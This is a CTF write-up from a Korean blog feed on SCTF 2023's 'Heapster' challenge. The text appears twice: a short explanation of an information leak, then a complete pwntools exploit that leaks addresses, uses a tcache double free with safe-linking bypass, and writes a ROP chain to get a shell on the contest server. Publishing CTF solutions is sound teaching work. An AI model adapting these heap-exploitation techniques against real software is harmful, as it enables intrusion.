SCTF on Uniguri's Blog /tags/sctf/ Recent content in SCTF on Uniguri's Blog Hugo -- gohugo.io en-us Wed, 23 Aug 2023 10:28:45 +0000 SCTF 2023 - Heapster /posts/ctf/2023/samsungctf/heapster/ Wed, 23 Aug 2023 10:28:45 +0000 /posts/ctf/2023/samsungctf/heapster/ <h2 id="취약점">취약점</h2> <p>Validation 함수을 이용해서 Stack의 값을 알아낼 수 있고 PIE, LIBC_BASE, Stack의 주소를 알아낼 수 있다. 또한 Heap에 data 영역을 사용해서 Heap의 주소도 알아낼 수 있다.</p> <h2 id="익스플로잇">익스플로잇</h2> <div class="collapsable-code"> <input id="1" type="checkbox" checked /> <label for="1"> <span class="collapsable-code__language">python</span> <span class="collapsable-code__title">Exploit</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-python" ><code> from pwn import * import struct # context.log_level = &#39;debug&#39; libc_one_gadget = 0xebcf8 libc_pop_rsi = 0x000000000002be51 def conceal_next(pos, ptr): return (pos&gt;&gt;12) ^ ptr def reveal_next(x): tmp = x ^ ( (x&gt;&gt;12)&amp;0xfff000000 ) tmp = x ^ ( (tmp&gt;&gt;12)&amp;0xffffff000 ) tmp = x ^ ( (tmp&gt;&gt;12) ) return tmp def add(index, data): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;1&#39;) p.sendline(str(index).encode()) p.send(data) def delete(index): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;2&#39;) p.sendline(str(index).encode()) def print_node(): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;3&#39;) def validation(): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;4&#39;) def leak_stack(index): add(index, b&#39;a&#39;*8) stack_addr = b&#39;&#39; for _ in range(8): for i in range(0x01, 0xff&#43;1): add(index, stack_addr &#43; struct.pack(&#34;B&#34;, i) &#43; b&#39;\n&#39;) validation() result = p.recvuntil(b&#39;.\n&#39;) if(b&#39;success&#39; in result): stack_addr &#43;= struct.pack(&#34;B&#34;, i) break elif(b&#39;fail&#39; in result): continue else: print(&#34;ERROR&#34;) assert(0) add(index, b&#39;\x00&#39;) return u64(stack_addr.ljust(8, b&#39;\x00&#39;)) ######### Open Process and etc. ######### # p = process(&#39;./chal&#39;) p = remote(&#39;heapster.sstf.site&#39;, 31339) elf = ELF(&#39;./chal&#39;) libc = ELF(&#39;./libc.so.6&#39;) ######### Leak Informations ######### ### Leak Stack ### stack_addr = leak_stack(10) &#43; 8 log.info(&#34;STACK : &#34; &#43; hex(stack_addr)) ### Leak PIE base ### # I don&#39;t use PIE base address, but I just leak it. pie_addr = leak_stack(11) - 0x1792 log.info(&#34;PIE : &#34; &#43; hex(pie_addr)) ### Leak Libc base ### libc_base = leak_stack(21) - 0x29d90 # __libc_start_call_main&#43;128 log.info(&#34;LIBC : &#34; &#43; hex(libc_base)) ### Leak Heap ### # reuse heap used for leak ret and pie. delete(10) # now, tcache : 10 || count = 1 delete(11) # now, tcache : 11 -&gt; 10 || count = 2 print_node() p.recvuntil(b&#39;-&gt;&#39;) heap_addr = reveal_next(u64(p.recvuntil(b&#39;\n&#39;)[:-1].ljust(8, b&#39;\x00&#39;))) log.info(&#34;HEAP : &#34; &#43; hex(heap_addr)) ######### ROP using Double Free ######### ### set pop rdi ### # tcache : 11 -&gt; 10 || count = 2 add(11, b&#39;a&#39;*16) delete(11) # now, tcache : 11 -&gt; 11 ; 10 || count = 3 add(3, p64(conceal_next(heap_addr &#43; 0x20, stack_addr - 0x8))) # now, tcache : 11 -&gt; (sfp of main) ; 11 || count = 2 add(31, b&#39;a&#39;*16) # now, tcache : (sfp of main) ; 10 || count = 1 pl = p64(stack_addr &#43; 0x20) pl &#43;= p64(libc_base &#43; libc_pop_rsi) add(30, pl) # now, tcache : (null) ; 10 || count = 0 for _ in range(3): add(11, b&#39;a&#39;*16) delete(11) # now, tcache : 11 -&gt; 11 -&gt; 11 ; 10 || count = 3 add(3, p64(conceal_next(heap_addr &#43; 0x20, stack_addr &#43; 0x10 - 0x8))) # now, tcache : 11 -&gt; (ret&#43;8 of main) ; 10 || count = 2 add(29, b&#39;a&#39;*16) # now, tcache : (ret&#43;8 of main) ; 10 || count = 1 pl = p64(0) pl &#43;= p64(libc_base &#43; libc_one_gadget) add(28, pl) ######### Exit main and get shell ######### p.sendline(b&#39;5&#39;) p.interactive() </code></pre> </div> <h2 id="취약점">취약점</h2> <p>Validation 함수을 이용해서 Stack의 값을 알아낼 수 있고 PIE, LIBC_BASE, Stack의 주소를 알아낼 수 있다. 또한 Heap에 data 영역을 사용해서 Heap의 주소도 알아낼 수 있다.</p> <h2 id="익스플로잇">익스플로잇</h2> <div class="collapsable-code"> <input id="1" type="checkbox" checked /> <label for="1"> <span class="collapsable-code__language">python</span> <span class="collapsable-code__title">Exploit</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-python" ><code> from pwn import * import struct # context.log_level = &#39;debug&#39; libc_one_gadget = 0xebcf8 libc_pop_rsi = 0x000000000002be51 def conceal_next(pos, ptr): return (pos&gt;&gt;12) ^ ptr def reveal_next(x): tmp = x ^ ( (x&gt;&gt;12)&amp;0xfff000000 ) tmp = x ^ ( (tmp&gt;&gt;12)&amp;0xffffff000 ) tmp = x ^ ( (tmp&gt;&gt;12) ) return tmp def add(index, data): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;1&#39;) p.sendline(str(index).encode()) p.send(data) def delete(index): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;2&#39;) p.sendline(str(index).encode()) def print_node(): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;3&#39;) def validation(): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;4&#39;) def leak_stack(index): add(index, b&#39;a&#39;*8) stack_addr = b&#39;&#39; for _ in range(8): for i in range(0x01, 0xff&#43;1): add(index, stack_addr &#43; struct.pack(&#34;B&#34;, i) &#43; b&#39;\n&#39;) validation() result = p.recvuntil(b&#39;.\n&#39;) if(b&#39;success&#39; in result): stack_addr &#43;= struct.pack(&#34;B&#34;, i) break elif(b&#39;fail&#39; in result): continue else: print(&#34;ERROR&#34;) assert(0) add(index, b&#39;\x00&#39;) return u64(stack_addr.ljust(8, b&#39;\x00&#39;)) ######### Open Process and etc. ######### # p = process(&#39;./chal&#39;) p = remote(&#39;heapster.sstf.site&#39;, 31339) elf = ELF(&#39;./chal&#39;) libc = ELF(&#39;./libc.so.6&#39;) ######### Leak Informations ######### ### Leak Stack ### stack_addr = leak_stack(10) &#43; 8 log.info(&#34;STACK : &#34; &#43; hex(stack_addr)) ### Leak PIE base ### # I don&#39;t use PIE base address, but I just leak it. pie_addr = leak_stack(11) - 0x1792 log.info(&#34;PIE : &#34; &#43; hex(pie_addr)) ### Leak Libc base ### libc_base = leak_stack(21) - 0x29d90 # __libc_start_call_main&#43;128 log.info(&#34;LIBC : &#34; &#43; hex(libc_base)) ### Leak Heap ### # reuse heap used for leak ret and pie. delete(10) # now, tcache : 10 || count = 1 delete(11) # now, tcache : 11 -&gt; 10 || count = 2 print_node() p.recvuntil(b&#39;-&gt;&#39;) heap_addr = reveal_next(u64(p.recvuntil(b&#39;\n&#39;)[:-1].ljust(8, b&#39;\x00&#39;))) log.info(&#34;HEAP : &#34; &#43; hex(heap_addr)) ######### ROP using Double Free ######### ### set pop rdi ### # tcache : 11 -&gt; 10 || count = 2 add(11, b&#39;a&#39;*16) delete(11) # now, tcache : 11 -&gt; 11 ; 10 || count = 3 add(3, p64(conceal_next(heap_addr &#43; 0x20, stack_addr - 0x8))) # now, tcache : 11 -&gt; (sfp of main) ; 11 || count = 2 add(31, b&#39;a&#39;*16) # now, tcache : (sfp of main) ; 10 || count = 1 pl = p64(stack_addr &#43; 0x20) pl &#43;= p64(libc_base &#43; libc_pop_rsi) add(30, pl) # now, tcache : (null) ; 10 || count = 0 for _ in range(3): add(11, b&#39;a&#39;*16) delete(11) # now, tcache : 11 -&gt; 11 -&gt; 11 ; 10 || count = 3 add(3, p64(conceal_next(heap_addr &#43; 0x20, stack_addr &#43; 0x10 - 0x8))) # now, tcache : 11 -&gt; (ret&#43;8 of main) ; 10 || count = 2 add(29, b&#39;a&#39;*16) # now, tcache : (ret&#43;8 of main) ; 10 || count = 1 pl = p64(0) pl &#43;= p64(libc_base &#43; libc_one_gadget) add(28, pl) ######### Exit main and get shell ######### p.sendline(b&#39;5&#39;) p.interactive() </code></pre> </div>